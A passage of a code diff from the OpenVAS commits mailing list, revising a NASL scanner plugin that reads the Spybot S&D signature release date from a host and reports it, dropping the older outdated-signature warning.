-  sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
-  sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
-} 
-else sigs_target_mmddyyyy = "n/a";
+	    sigs_target = strstr(contents, "ReleaseDate=");
+            if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
+	    if (isnull(sigs_target)) sigs_target = "n/a";
 
+	    if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
+	        a = split(sigs_target, sep:"-", keep:0);
+		sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
+		sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
+	    }
+	    else sigs_target_mmddyyyy = "n/a";
 
-sigs_vendor_yyyymmdd = "20080924";
-sigs_vendor_mmddyyyy = string(
-  substr(sigs_vendor_yyyymmdd, 4, 5),
-  "/",
-  substr(sigs_vendor_yyyymmdd, 6, 7),
-  "/",
-  substr(sigs_vendor_yyyymmdd, 0, 3)
-);
+            if(version && sigs_target_mmddyyyy) {
+            
+               report = string(
+                               desc,
+                               "\n\n",
+                               "Plugin output :\n\n",
+                               "Version    : ", version, "\n",
+                               "Signatures : ", sigs_target_mmddyyyy);
+          
+               if(report_verbosity > 0) {
+                  security_note(port:port, data:report);
+                  exit(0);
+               }
+           }
+	 }  
+       }
+     break;
+    }  
+ }
 
-# Generate report.
-report = string(
-  desc,
-  "\n\n",
-  "Plugin output :\n\n",
-  "  Version    : ", ver, "\n",
-  "  Signatures : ", sigs_target_mmddyyyy
-);
-
-if (sigs_target == "n/a")
-{
-    report = string(
-      report,
-      "\n\n",
-      "The remote host has never updated its Spybot S&D detection rule\n",
-      "signatures. The latest version is ", sigs_vendor_mmddyyyy, ". As a result, the\n",
-      "remote host might contain malware."
-    );
-    security_hole(port:kb_smb_transport(), data:report);
-}
-else if (sigs_target_yyyymmdd)
-{
-  if (int(sigs_target_yyyymmdd) < int(sigs_vendor_yyyymmdd))
-  {
-    report = string(
-      report,
-      "\n\n",
-      "The remote host has an out-dated version of the Spybot S&D\n",
-      "detection rule signatures; the most recent set is ", sigs_vendor_mmddyyyy, ".\n",
-      "As a result, the remote host might contain malware."
-    );
-    security_hole(port:kb_smb_transport(), data:report);
-  }	 
-  else security_note(port:kb_smb_transport(), data:report);
-}
+exit(0);



More information about the Openvas-commits mailing list